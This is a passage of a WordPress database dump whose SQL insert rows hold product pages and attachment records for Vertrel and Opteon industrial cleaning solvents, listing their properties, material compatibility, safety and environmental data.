Cleaning</li>\n</ul>\n<strong>Specification Conformity Tests</strong>\n\nVertrel SDG has been tested in a variety of industry tests, including:\nBoeing D6-17487 Revision P Solvent Cleaners; General Cleaning\nARP 1755 B Effect of Cleaning Agent on Aircraft Engine Materials\n\nDouglas Aircraft Company Type 1: Materials and Procedures for General Exterior Cleaning of Painted and Unpainted Surfaces. (General Purpose Cleaner)\n\n<strong>Environmental</strong>\n\nVertrel SDG has “zero” ozone depletion potential and low global warming potential. See table below for various environmental properties of Vertrel SDG. Vertrel SDG is accepted by the US Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances (solvent category). It is not SNAP approved for aerosol packages.\n\n<strong>Safety/Flammability/Storage</strong>\n\nData from acute toxicity studies has demonstrated that SDG has low toxicity. It has a calculated AEL (Acceptable Exposure Limit) of 193 ppm based on its individual components. AEL is an airborne inhalation exposure limit established by Dupont that specifies time-weighted average concentrations to which nearly all workers may be repeatedly exposed without adverse effects. The calculated AEL is in accordance with ACGIH formulas for TLVs for mixtures. Vertrel SDG is a slight skin and eye irritant and has low acute inhalation toxicity.\n\nPlease refer to the MSDS for information on detailed exposure limits and toxicity-related data.\n\nVertrel SDG exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. The product is volatile, and if allowed to evaporate and mix with air, the vapor may become flammable. Addition of alcohols such as methanol, ethanol or isopropanol to Vertrel SDG will increase the flammability of Vertrel SDG. Therefore, it is recommended that alcohol should not be mixed with SDG.\n\n<strong>Material Compatibility</strong>\n\nSDG is compatible with metals. Plastics that may show signs of softening, swelling or other changes include acrylics, ABS and polycarbonate. Elastomers, if affected, will generally revert to within a few percent of original size after air-drying. Prior-to-use, testing of plastics and elastomers should be performed under conditions expected during normal operation (e.g., time in contact with Vertrel SDG, temperature, etc.). For more information on material compatibility, contact Miller-Stephenson.\n\nContact with highly basic materials, pH 10 and above, is not recommended.', 'Vertrel SDG', 'Vertrel SDG is an engineered mixture of nonflammable hydrofluorocarbons (HFCs) and trans-1,2-dichloroethylene (t-DCE). Vertrel SDG is designed to replace trichloroethylene (TCE) and n-propyl bromide (nPB); and perform in applications where maximum cleaning power is needed. It can also be used as a substitute for other cleaners such HCFC-225 and its blends, HCFC-141b, HFEs, PFCs, CFCs, and aqueous cleaners when safety and environmental concerns and/or floor space and cleanliness are at a premium.', 'inherit', 'closed', 'closed', '', '1268-autosave-v1', '', '', '2016-10-06 18:08:48', '2016-10-06 18:08:48', '', 1268, 'https://132.148.10.86/wordpress/1268-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1275, 2, '2016-09-07 14:16:35', '2016-09-07 14:16:35', '', 'Vertrel SDG', '', 'inherit', 'open', 'closed', '', 'vertrel-sdg-3', '', '', '2016-10-06 18:09:08', '2016-10-06 18:09:08', '', 1268, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel-sdg-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1276, 2, '2016-09-07 14:31:59', '2016-09-07 14:31:59', '<strong>Introduction to Vertrel SFR</strong>\r\n\r\nVertrel SFR is an engineered mixture of nonflammable hydrofluorocarbons (HFCs), trans-1,2-dichloroethylene (t-DCE) and methanol.\r\n\r\nVertrel SFR is designed to remove difficult to remove high temperature fluxes used in lead free and no clean solders. It has excellent solvency power for a wide range of soils including ionic soils. The low surface tension and nonflammable properties of Vertrel SFR make it an ideal ultrasonic vapor degreasing solvent.\r\n\r\nVertrel SFR is a non-ozone depleter and can replace many solvents such as trichloroethylene (TCE), n-propyl bromide (nPB), HCFC-225 blends, HCFC-141b, HFEs, PFCs, and CFCs. Vertrel SFR can also replace aqueous cleaners where floor space and cleanliness are at a premium.\r\n\r\n<strong>Features and Benefits</strong>\r\n\r\nVertrel SFR does a good job balancing performance with favorable environmental and worker safety properties.\r\n<ul>\r\n 	<li>Excellent solvency power (KB Value&gt;100) to remove organic and ionic contaminants: Superior cleaning performance</li>\r\n 	<li>Fast drying: Increases productivity</li>\r\n 	<li>Low surface tension: Able to penetrate and clean tight areas</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Can be used with ultrasonics.</li>\r\n 	<li>Non flammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential</li>\r\n 	<li>Low global warming potential</li>\r\n 	<li>Existing equipment can be used with minor or no modification</li>\r\n 	<li>No surfactants needed: Residue free cleaning is promoted.</li>\r\n</ul>\r\n<strong>Typical Applications</strong>\r\n<ul>\r\n 	<li>Defluxing</li>\r\n 	<li>Oil, grease, and wax removal</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>\r\n<strong>Specification Conformity Tests</strong>\r\n\r\nVertrel SFR has been tested in a variety of industrytests, including:\r\n\r\nBoeing D6-17487 Revision P\r\nSolvent Cleaners; General Cleaning\r\n\r\nARP 1755 B\r\nEffect of Cleaning Agent on Aircraft Engine Materials\r\n\r\nDouglas Aircraft Company\r\nType 1: Materials and Procedures for General Exterior Cleaning of\r\nPainted and Unpainted Surfaces. (General Purpose Cleaner)\r\n\r\n<strong>Environmental Properties</strong>\r\n\r\nVertrel SFR has zero ozone depletion potential and low global warming potential.  Vertrel SFR is accepted by the US Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances (solvent category). It is not SNAP approved for aerosol packages.\r\n\r\n<strong>Safety/Flammability/Storage</strong>\r\n\r\nData from acute toxicity studies has demonstrated that Vertrel SFR has low toxicity. It has a calculated AEL (Acceptable Exposure Limit) of 187 ppm based on its individual components. AEL is an airborne inhalation exposure limit established by Dupont that specifies time-weighted average concentrations to which nearly all workers may be repeatedly exposed without adverse effects. The calculated AEL is in accordance with ACGIH formulas for TLVs for mixtures. Vertrel SFR is a slight skin and eye irritant and has low acute inhalation toxicity.\r\n\r\nPlease refer to the MSDS for information on detailed exposure limits and toxicity-related data.\r\n\r\nVertrel SFR exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. The product is volatile, and if allowed to evaporate and mix with air, the vapor may become flammable.\r\n\r\nVertrel SFR is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. If solvent is stored below –10 °C (14 °F), mix prior to use. Do not allow stored product to exceed 52 °C (125 °F) to prevent leakage or potential rupture of container from pressure and expansion.\r\n\r\n<strong>Material Compatibility</strong>\r\n\r\nMost metals, plastics and elastomers commonly used for components mounted on printed wiring board assemblies can be safely cleaned with Vertrel SFR. Plastics that may show signs of softening, swelling or other changes include acrylics, ABS and polycarbonate. Elastomers, if affected, will generally revert to within a few percent of original size after air-drying. Prior-to-use, testing of plastics and elastomers should be performed under conditions expected during normal operation (e.g., time in contact with SFR, temperature, etc.). For more information on material compatability, contact Miller-Stephenson.\r\n\r\nContact with highly basic materials, pH 10 and above, is not recommended.\r\n\r\nLarge amounts of water may extract the alcohol component of Vertrel SFR, and reduce cleaning performance. Therefore, to reduce alcohol loss, use desiccant dryers rather than water separators in the condensate return line.\r\n\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">Please click here for more information regarding solvents and replacements.</a>\r\n\r\nhttps://www.miller-stephenson.com/opteon-sion-vapor-degreasing/', 'Vertrel SFR', 'Vertrel SFR specialty fluid can solve your most difficult defluxing needs. Vertrel SFR is an engineered mixture of nonflammable hydrofluorocarbons (HFCs), trans-1, 2-dichloroethlyene (t-DCE) and methanol.', 'publish', 'open', 'closed', '', 'vertrel-sfr', '', '', '2016-10-10 15:58:20', '2016-10-10 15:58:20', '', 0, 'https://132.148.10.86/wordpress/product/vertrel-sfr/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1277, 2, '2016-09-07 14:37:30', '2016-09-07 14:37:30', '', 'Vertrel SFR', '', 'inherit', 'open', 'closed', '', 'vertrel-sfr-2', '', '', '2016-10-06 18:22:45', '2016-10-06 18:22:45', '', 1276, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel-sfr.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1278, 2, '2016-09-07 14:38:28', '2016-09-07 14:38:28', '<strong>Introduction to Vertrel XF</strong>\r\n\r\nVertrel XF is a proprietary hydrofluorocarbon fluid with zero ozone depletion potential and low global warming potential ideally suited for use in vapor degreasing equipment for cleaning, rinsing, and drying. It can replace current hydrochlorofluorocarbon (HCFC) and perfluorocarbon (PFC) fluids in most applications.\r\n\r\nVertrel XF is HFC 43-10mee or 2,3-dihydrodeca–fluoropentane; empirical formula C5H2F10. It is a clear, colorless liquid with the properties shown in Table 1.\r\n\r\nUnique physical properties include a high density, low viscosity, and low surface tension. This combined with nonflammability, chemical and thermal stability, low toxicity, and ease of recovery by distillation make Vertrel XF ideal for a broad range of applications. Solvency is selective, but can be enhanced by use of appropriate azeotropes and blends with alcohols, hydrocarbons, esters, etc..\r\n\r\n<strong>Typical Applications</strong>\r\n<ul>\r\n 	<li>Cleaning and rinsing agent</li>\r\n 	<li>Drying fluid</li>\r\n 	<li>Particulate remover</li>\r\n 	<li>Fluorocarbon lubricant carrier</li>\r\n 	<li>Solvent and dispersion media</li>\r\n 	<li>Heat transfer media</li>\r\n 	<li>Dielectric fluid</li>\r\n 	<li>Replacement for many HCFC, PFC, and CFC-113 applications</li>\r\n</ul>\r\nVertrel XF is ideally suited for cleaning fine particulate matter (submicron range) from metal and nonmetal parts. Removal of particle contamination requires a solvent that can minimize the thickness of the laminar boundary layer where particles are bonded to the substrate. If the boundary layer thickness is less than the particle diameter, momentum from the flowing solvent can efficiently dislodge the particles and carry them away. Vertrel XF, with its lower viscosity and higher density, results in a thinner boundary layer, which enhances cleaning. Common aqueous cleaning fluids, mixtures of water and detergent, have higher viscosities and lower densities compared to Vertrel XF, making these fluids less efficient.\r\n\r\nThe electronic attraction between particle and surface can be overcome further by increasing the polarity of the fluid through the addition of small amounts of alcohols. Chemours offers a series of proprietary azeotrope and blend compositions that exploit this property.\r\n\r\nAnother common cleaning technique is the addition of ultrasonics to the solvent. High frequency, ultrasonic waves produce tiny bubbles that form and collapse (cavitate) as the wave passes. Cavitation energy increases with decreasing viscosity, another advantage of Vertrel XF, improving its ability to mechanically dislodge particle contamination.\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/"><strong>Vapor Degreasing Process</strong></a>\r\n\r\nUse of modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to greatly reduce vapor losses from boiling solvent degreasing, defluxing, rinsing, and drying equipment.\r\n\r\nNeat Vertrel XF can be used for rinsing, drying, and some cleaning applications, but use with other components, such as azeotropes or simple blends, can provide improved solvency and soil removal. Vertrel XF forms azeotropes or constant boiling mixtures with many similar boiling range components. Five nonflammable proprietary azeotrope compositions have been developed that are useful for general, as well as precision, cleaning and defluxing. See specific product bulletins for details.\r\n\r\n<strong>Table 1.</strong> Density and Vapor Pressure Change with Temperature\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="250"><strong>Temperature, °C (°F)</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Density, kg/L</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Vapor Pressure, atm</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">-20 (–4)</td>\r\n<td style="text-align: center;">1.7</td>\r\n<td style="text-align: center;">0.021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">-10 (14)</td>\r\n<td style="text-align: center;">1.68</td>\r\n<td style="text-align: center;">0.047</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">0 (32)</td>\r\n<td style="text-align: center;">1.66</td>\r\n<td style="text-align: center;">0.082</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">10 (50)</td>\r\n<td style="text-align: center;">1.62</td>\r\n<td style="text-align: center;">0.143</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">20 (68)</td>\r\n<td style="text-align: center;">1.6</td>\r\n<td style="text-align: center;">0.232</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">30 (86)</td>\r\n<td style="text-align: center;">1.57</td>\r\n<td style="text-align: center;">0.374</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">40 (104)</td>\r\n<td style="text-align: center;">1.55</td>\r\n<td style="text-align: center;">0.571</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">50 (122)</td>\r\n<td style="text-align: center;">1.51</td>\r\n<td style="text-align: center;">0.843</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">60 (140)</td>\r\n<td style="text-align: center;">1.49</td>\r\n<td style="text-align: center;">1.212</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">70 (158)</td>\r\n<td style="text-align: center;">1.46</td>\r\n<td style="text-align: center;">1.695</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">80 (176)</td>\r\n<td style="text-align: center;">1.43</td>\r\n<td style="text-align: center;">2.306</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">90 (194)</td>\r\n<td style="text-align: center;">1.4</td>\r\n<td style="text-align: center;">3.083</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">100 (212)</td>\r\n<td style="text-align: center;">1.38</td>\r\n<td style="text-align: center;">4.042</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">110 (230)</td>\r\n<td style="text-align: center;">1.34</td>\r\n<td style="text-align: center;">5.211</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">120 (248)</td>\r\n<td style="text-align: center;">1.32</td>\r\n<td style="text-align: center;">6.621</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">130 (266)</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">8.301</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Solvency</strong>\r\n\r\nUnlike PFCs, Vertrel XF is completely miscible with most esters, ketones, ethers, ether-alcohols, and the lower alcohols, such as methanol, ethanol, and isopropanol. The lower hydrocarbons, such as hexane and heptane, are also soluble. Neat Vertrel XF has limited solvency for many higher molecular weight materials, such as hydrocarbon oils, silicone oils, waxes, and greases; here combinations with the many readily miscible esters, alcohols, and lower hydrocarbons can enhance solubility and cleaning efficiency. Like CFC-113 and PFCs, Vertrel XF has high solubility for Krytox and “Fomblin” fluorocarbon lubricants and can be used either as an application carrier fluid or to remove them.\r\n\r\n<strong>Plastic and Elastomer Compatibility</strong>\r\n\r\nA large variety of plastics and elastomers can be safely exposed to Vertrel XF. Tables 2 and 3 summarize test results on short-term exposures of unstressed plastics and elastomers, which simulate a typical cleaning cycle.\r\n\r\nLong-term compatibility data simulating exposure of vapor degreaser construction materials is available from Chemours upon request.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\n<strong>Table 2</strong>. Plastic Compatibility Immersion: 15 Minutes at Room Temperature\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Polyethylene</td>\r\n<td>ABS</td>\r\n</tr>\r\n<tr>\r\n<td>Polypropylene</td>\r\n<td>Acetal</td>\r\n</tr>\r\n<tr>\r\n<td>Polystyrene</td>\r\n<td>Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td>Polyester, PET, PBT</td>\r\n<td>Ionomer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Oxide, PPO</td>\r\n<td>Liquid Crystal Polymer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyimide, PI, PEI, PAI</td>\r\n<td>Phenolic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyetherketone, PEK</td>\r\n<td>PVC, CPVC</td>\r\n</tr>\r\n<tr>\r\n<td>Polyaryletherketone, PEEK</td>\r\n<td>PTFE, ETFE</td>\r\n</tr>\r\n<tr>\r\n<td>Polysulfone</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Polyarylsulfone</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Sulfide, PPS</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Incompatible*</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Acrylic</td>\r\n<td>Cellulosic</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Table 3</strong>. Elastomer Compatibility Immersion: 15 Minutes at Room Temperature\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td colspan="2" width="456">Compatible</td>\r\n</tr>\r\n<tr>\r\n<td>Buna-N, NBR, Nitrile</td>\r\n<td>Buna-S, SBR, GRS</td>\r\n</tr>\r\n<tr>\r\n<td>Butyl Rubber, IIR</td>\r\n<td>Chlorosulfonated PE</td>\r\n</tr>\r\n<tr>\r\n<td>EPM, EPDM, Nordel®</td>\r\n<td>Polysulfide</td>\r\n</tr>\r\n<tr>\r\n<td>Natural Rubber, Isoprene</td>\r\n<td>Neoprene</td>\r\n</tr>\r\n<tr>\r\n<td>Urethane</td>\r\n<td>Viton™ B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td>Silicone</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Incompatible*</td>\r\n</tr>\r\n<tr>\r\n<td>None Tested</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Material composition varies depending upon compounding agents, plasticizers, processing, etc. Specific materials should be tested for compatibility with solvent.\r\n\r\n<strong>Metals and Other Compatibility</strong>\r\n\r\nVertrel XF is fully compatible with the metals listed below after exposure for two weeks at 100°C (212°F) in sealed tubes with and without water contact.\r\n<ul>\r\n 	<li>Zinc*</li>\r\n 	<li>Stainless Steel</li>\r\n 	<li>Brass*</li>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper*</li>\r\n</ul>\r\n*Slight discoloration with water present\r\n\r\nVertrel XF is not compatible with strong bases; therefore, contact with highly basic process materials is not recommended.\r\n\r\n<strong>Exposure Limits</strong>\r\n\r\nData from acute toxicity studies has demonstrated that Vertrel XF has low toxicity. Vertrel XF is a slight skin and eye irritant and has low acute inhalation toxicity.\r\n\r\n<strong>Safety/Flammability</strong>\r\n\r\nVertrel XF is nonflammable and does not become flammable during boiling or evaporation. It exhibits no closed or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. It is thermally stable to 300°C (572°F) and does not oxidize or degrade during storage.\r\n\r\n<strong>Recovery</strong>\r\n\r\nVertrel XF is a pure component material and is easily recoverable by off-line and in-line distillation equipment, such as a vapor degreaser or still. The presence of soil, however, may alter the characteristics of the material during the recovery operation. Recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel XF to ensure proper classification for waste disposal.\r\n\r\n<strong>Storage/Handling</strong>\r\n\r\nVertrel XF is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. Do not allow stored product to exceed 52°C (125°F) to prevent leakage or\r\npotential rupture of container from pressure and expansion. Consideration should be given to retrofit of existing or purchase of new, vapor degreasing equipment to provide vapor containment technology that enables safe and economical use of Vertrel XF. Drum pumps are recommended to dispense Vertrel XF from its container. Refer to the Safety Data Sheet (SDS) for specific handling precautions and instructions.\r\n\r\n<strong>Environmental Legislation</strong>\r\n\r\nVertrel XF has zero ozone depletion potential and a low global warming potential (Table 4). Vertrel XF and its azeotropes and blends are used as alternatives to CFC-113, methylchloroform, HCFCs, and PFCs in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\r\n\r\nVertrel XF is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances. HFC 43-10mee or\r\ndecafluoropentane is exempt from classification as a volatile organic compound (VOC) by the EPA. Vertrel XF is also VOC compliant under the California South Coast Air Quality Management District (SCAQMD) regulations, which require VOC content less than 50 g/L of solvent.\r\n\r\nVertrel XF is listed in the TSCA inventory. It is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See SDS Regulatory Section.\r\n\r\nVertrel XF is not a hazardous air pollutant (HAP), and, therefore, not subject to NESHAP regulation. Spent Vertrel XF is not an RCRA characteristic or listed waste. However, addition of contaminants could change that status. Vertrel XF is not included in the SARA Title III Section 313 list of toxic chemicals and is not subject to SARA Title III (EPCRA) reporting requirements.\r\n\r\n<strong>Table 4.</strong> Environmental Properties\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Property</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Vertrel XF</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Formula</td>\r\n<td style="text-align: center;">C5H2F10</td>\r\n</tr>\r\n<tr>\r\n<td>Class</td>\r\n<td style="text-align: center;">Hydrofluorocarbon (HFC)</td>\r\n</tr>\r\n<tr>\r\n<td>Atmospheric Lifetime, yr</td>\r\n<td style="text-align: center;">17.1</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential (ODP)</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming* Potential (GWP/100 yr ITH)</td>\r\n<td style="text-align: center;">1300</td>\r\n</tr>\r\n<tr>\r\n<td>Volatile Organic Compounds (VOC, g/L)</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*IPCC Second Assessment Report (1995)\r\n\r\n<strong>Specifications</strong>\r\n\r\nComposition and specifications are shown in Table 5. Vertrel™ XF is listed in the TSCA Inventory.\r\n\r\n<strong>Table 5.</strong> Vertrel XF Specifications\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Property</td>\r\n<td style="text-align: center;" width="206">Vertrel™ XF</td>\r\n</tr>\r\n<tr>\r\n<td>Fluoropentanes, wt%</td>\r\n<td style="text-align: center;">99.9 min.</td>\r\n</tr>\r\n<tr>\r\n<td>Nonvolatile Residue, ppm wt</td>\r\n<td style="text-align: center;">2.0 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Moisture, ppm wt</td>\r\n<td style="text-align: center;">50 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Acidity, mg KOH/g</td>\r\n<td style="text-align: center;">0.01 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Clear, Colorless</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more about Vertel and nPB replacement click here.</a>', 'Vertrel XF', 'A very mild, nonflammable solvent. Excellent compatibility with most plastics. Typical applications include: cleaning and rinsing, drying, particulate removal, fluorocarbon lubricant carrier, heat transfer, oxygen service and replacement for many HCFC and PFC. Removes PTFE release agents. NSN 6850-01-460-4914 (Aerosol).', 'publish', 'open', 'closed', '', 'vertrel-xf', '', '', '2016-10-13 17:06:47', '2016-10-13 17:06:47', '', 0, 'https://132.148.10.86/wordpress/product/vertrel-xf/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1279, 3, '2016-09-07 14:39:24', '2016-09-07 14:39:24', '', 'VAZO 64 AIBN', '', 'inherit', 'open', 'closed', '', 'vazo-64-aibn', '', '', '2016-09-07 14:39:24', '2016-09-07 14:39:24', '', 427, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-64-AIBN.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1280, 3, '2016-09-07 14:42:03', '2016-09-07 14:42:03', '', 'VAZO 67 Radical Initiator', '', 'inherit', 'open', 'closed', '', 'vazo-67-composites', '', '', '2016-11-24 03:53:53', '2016-11-24 03:53:53', '', 575, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-67-composites.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1281, 2, '2016-09-07 14:43:17', '2016-09-07 14:43:17', '', 'Vertrel XF', '', 'inherit', 'open', 'closed', '', 'vertrel-xf-2', '', '', '2016-10-06 19:11:10', '2016-10-06 19:11:10', '', 1278, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel-xf.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1282, 3, '2016-09-07 14:48:36', '2016-09-07 14:48:36', '', 'VAZO 52', '', 'inherit', 'open', 'closed', '', 'vazo-52-4', '', '', '2016-09-07 14:48:36', '2016-09-07 14:48:36', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-52.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1283, 2, '2016-09-07 14:50:40', '2016-09-07 14:50:40', '', 'Vertrel-XF-PDF', '', 'inherit', 'open', 'closed', '', 'vertrel-xf-pdf', '', '', '2016-09-07 14:50:40', '2016-09-07 14:50:40', '', 1278, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Vertrel-XF-PDF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1284, 2, '2016-09-07 14:51:39', '2016-09-07 14:51:39', '', 'MS-780, 782', '', 'inherit', 'open', 'closed', '', 'ms-780-782-2', '', '', '2016-09-07 14:51:39', '2016-09-07 14:51:39', '', 1278, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-780-782.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1285, 2, '2016-09-07 14:55:28', '2016-09-07 14:55:28', '', 'vertrel', '', 'inherit', 'open', 'closed', '', 'vertrel-2', '', '', '2016-09-07 14:55:28', '2016-09-07 14:55:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1287, 2, '2016-09-07 15:35:34', '2016-09-07 15:35:34', '<h1><strong><span style="font-size: 14.4px;">Opteon™ Sion Introduction</span></strong></h1>\r\nOpteon™ Sion specialty fluid is designed to meet the high solvency needs in the industrial cleaning market. Opteon™ Sion is a safe, nonflammable, and environmentally friendly solvent with no ozone depletion potential (ODP) and a low global warming potential (GWP) (&lt;15), which are all highly desirable in industrial cleaning applications like <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreasing.</a>\r\n\r\nOpteon™ Sion is a blend of proprietary fluids and trans-1, 2-dichloroethylene (t-DCE) with azeotrope-like properties. Its exceptional solvency power (KB value = 103) makes it an ideal candidate for replacement of trichloroethylene (TCE), n-propyl bromide (nPB), benzene, perchloroethylene, methylene chloride, and other strong solvency fluids, where maximum cleaning power is a requirement. Opteon™ Sion is also a great replacement option for solvents with low to mid-solvency power, such as HCFC-225, HCFC-141b, HFEs, PFCs, CFCs, and aqueous cleaners.\r\n\r\nOpteon™ Sion has the ability to clean a wide range of contaminants. The fluid features high solvency and low surface tension, which can improve the efficiency of a <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a>. Opteon™ Sion cleaning fluid is easy to use and provides reliability with hassle-free maintenance.\r\n<h4><strong>Opteon Sion Features and Benefits</strong></h4>\r\n<ul>\r\n 	<li>Superior cleaning performance with best solvency power in its class (KB value = 103)</li>\r\n 	<li>Fast drying with an optimum boiling point (47 °C [117 °F]), allows cleaned parts to be processed and used immediately</li>\r\n 	<li>High soil loading capacity boosts productivity by reducing equipment downtime associated with solvent change-outs</li>\r\n 	<li>Product maintains compositional stability during use (azeotropic-like mixture)</li>\r\n 	<li>Maintenance free: No stabilizer maintenance required, easy to maintain and use</li>\r\n 	<li>In general, existing <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreasing</a> equipment can be used with minor or no modifications. See Opteon™ Sion Retrofit Guidelines</li>\r\n 	<li>No surfactants needed: Removes extra washing steps to achieve residue-free cleaning</li>\r\n 	<li>Recyclable and reusable: Reduces cost of ownership and environmental footprint</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Low odor and toxicity</li>\r\n 	<li>Excellent environmental profile: Low GWP (&lt;15), no ODP</li>\r\n</ul>\r\n<h4><strong>Typical Applications</strong></h4>\r\n<ul>\r\n 	<li>Oil and grease removal</li>\r\n 	<li>Precision cleaning</li>\r\n 	<li>High solvency defluxing</li>\r\n 	<li>Silicone removal</li>\r\n 	<li><a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">Vapor degreasing </a></li>\r\n 	<li>Cold cleaning</li>\r\n</ul>\r\nTable 1. Physical Properties\r\n<table width="1379">\r\n<tbody>\r\n<tr>\r\n<td width="254">Property</td>\r\n<td style="text-align: center;" width="125">Units</td>\r\n<td style="text-align: center;" width="125">Opteon™Sion</td>\r\n<td style="text-align: center;" width="125">CFC-113</td>\r\n<td style="text-align: center;" width="125">HCFC-141b</td>\r\n<td style="text-align: center;" width="125">Novec® 72DE</td>\r\n<td style="text-align: center;" width="125">HCFC-225\r\nca/cb</td>\r\n<td style="text-align: center;" width="125">TCE</td>\r\n<td style="text-align: center;" width="125">Perc</td>\r\n<td style="text-align: center;" width="125">nPB</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">48</td>\r\n<td>32</td>\r\n<td style="text-align: center;">43</td>\r\n<td style="text-align: center;">54</td>\r\n<td style="text-align: 